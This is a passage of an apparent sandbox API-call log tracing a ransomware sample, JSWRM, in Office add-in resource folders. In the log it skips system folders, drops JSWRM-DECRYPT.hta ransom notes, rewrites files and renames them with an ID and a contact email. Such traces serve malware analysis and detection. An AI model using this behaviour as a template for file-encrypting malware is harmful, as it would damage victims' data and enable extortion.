lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.000] WriteFile (in: hFile=0x264, lpBuffer=0x27a340*, nNumberOfBytesToWrite=0x114c0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesWritten=0x345de60*=0x114c0, lpOverlapped=0x0) returned 1 [0127.001] CloseHandle (hObject=0x264) returned 1 [0127.001] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1029\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1029\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1029\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1029\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.002] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf632eb9d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf632eb9d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x114c0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 0 [0127.002] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0127.002] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaf7a22a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfaf7a22a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfaf7a22a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="1030", cAlternateFileName="")) returned 1 [0127.002] lstrcmpiW (lpString1="1030", lpString2=".") returned 1 [0127.002] lstrcmpiW (lpString1="1030", lpString2="..") returned 1 [0127.002] lstrcmpiW (lpString1="1030", lpString2="...") returned 1 [0127.002] lstrcmpiW (lpString1="1030", lpString2="windows") returned -1 [0127.002] lstrcmpiW (lpString1="1030", lpString2="recovery") returned -1 [0127.002] lstrcmpiW (lpString1="1030", lpString2="perflogs") returned -1 [0127.002] lstrcmpiW (lpString1="1030", lpString2="documents and settings") returned -1 [0127.002] lstrcmpiW (lpString1="1030", lpString2="$RECYCLE.BIN") returned 1 [0127.002] lstrcmpiW (lpString1="1030", lpString2="system volume information") returned -1 [0127.002] lstrcmpiW (lpString1="1030", lpString2="msocache") returned -1 [0127.002] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1030\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1030\\jswrm-decrypt.hta")) returned 0xffffffff [0127.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0127.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0127.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1030\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1030\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0127.084] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.084] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.085] CloseHandle (hObject=0x338) returned 1 [0127.085] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1030\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1030\\jswrm-decrypt.hta")) returned 0x20 [0127.085] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1030\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaf7a22a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfaf7a22a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4268c3b9, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName=".", cAlternateFileName="")) returned 0x231b40 [0127.085] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0127.085] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaf7a22a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfaf7a22a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x4268c3b9, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="..", cAlternateFileName="")) returned 1 [0127.086] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0127.086] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0127.086] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4268c3b9, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4268c3b9, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4268c3b9, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0127.086] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0127.086] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0127.086] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0127.086] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0127.086] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0127.086] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0127.086] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0127.086] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0127.086] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0127.086] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0127.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0127.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0127.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0127.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0127.086] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfaf7a22a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfaf7a22a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11860, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 1 [0127.086] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2=".") returned 1 [0127.086] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="..") returned 1 [0127.086] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="...") returned 1 [0127.086] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="windows") returned -1 [0127.086] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="recovery") returned -1 [0127.086] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="perflogs") returned 1 [0127.086] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="documents and settings") returned 1 [0127.086] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="$RECYCLE.BIN") returned 1 [0127.086] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="system volume information") returned -1 [0127.086] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="msocache") returned 1 [0127.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0127.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x241010, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0127.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0127.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0127.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0127.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0127.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1030\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1030\\powerpivotexcelclientaddin.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0127.088] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=71776) returned 1 [0127.088] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.088] ReadFile (in: hFile=0x264, lpBuffer=0x27a340, nNumberOfBytesToRead=0x11860, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesRead=0x345de64*=0x11860, lpOverlapped=0x0) returned 1 [0127.095] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.095] WriteFile (in: hFile=0x264, lpBuffer=0x27a340*, nNumberOfBytesToWrite=0x11860, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesWritten=0x345de60*=0x11860, lpOverlapped=0x0) returned 1 [0127.095] CloseHandle (hObject=0x264) returned 1 [0127.096] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1030\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1030\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1030\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1030\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.097] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfaf7a22a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfaf7a22a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11860, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 0 [0127.097] FindClose (in: hFindFile=0x231b40 | out: hFindFile=0x231b40) returned 1 [0127.097] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x633d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x633d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x633d60, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="1031", cAlternateFileName="")) returned 1 [0127.097] lstrcmpiW (lpString1="1031", lpString2=".") returned 1 [0127.097] lstrcmpiW (lpString1="1031", lpString2="..") returned 1 [0127.097] lstrcmpiW (lpString1="1031", lpString2="...") returned 1 [0127.097] lstrcmpiW (lpString1="1031", lpString2="windows") returned -1 [0127.097] lstrcmpiW (lpString1="1031", lpString2="recovery") returned -1 [0127.097] lstrcmpiW (lpString1="1031", lpString2="perflogs") returned -1 [0127.097] lstrcmpiW (lpString1="1031", lpString2="documents and settings") returned -1 [0127.097] lstrcmpiW (lpString1="1031", lpString2="$RECYCLE.BIN") returned 1 [0127.097] lstrcmpiW (lpString1="1031", lpString2="system volume information") returned -1 [0127.097] lstrcmpiW (lpString1="1031", lpString2="msocache") returned -1 [0127.097] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1031\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1031\\jswrm-decrypt.hta")) returned 0xffffffff [0127.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0127.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0127.098] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1031\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1031\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0127.101] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.101] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.102] CloseHandle (hObject=0x338) returned 1 [0127.102] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1031\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1031\\jswrm-decrypt.hta")) returned 0x20 [0127.102] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1031\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x633d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x633d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x426b262e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName=".", cAlternateFileName="")) returned 0x232240 [0127.102] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0127.102] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x633d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x633d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x426b262e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="..", cAlternateFileName="")) returned 1 [0127.102] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0127.102] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0127.102] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x426b262e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x426b262e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x426b262e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0127.102] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0127.102] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0127.103] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0127.103] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0127.103] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0127.103] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0127.103] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0127.103] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0127.103] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0127.103] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0127.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0127.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0127.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0127.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0127.103] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x633d60, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x633d60, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x116c0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 1 [0127.103] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2=".") returned 1 [0127.103] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="..") returned 1 [0127.103] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="...") returned 1 [0127.103] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="windows") returned -1 [0127.103] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="recovery") returned -1 [0127.103] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="perflogs") returned 1 [0127.103] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="documents and settings") returned 1 [0127.103] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="$RECYCLE.BIN") returned 1 [0127.103] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="system volume information") returned -1 [0127.103] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="msocache") returned 1 [0127.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0127.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x240ef8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0127.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0127.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x240fe8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0127.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0127.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0127.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1031\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1031\\powerpivotexcelclientaddin.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 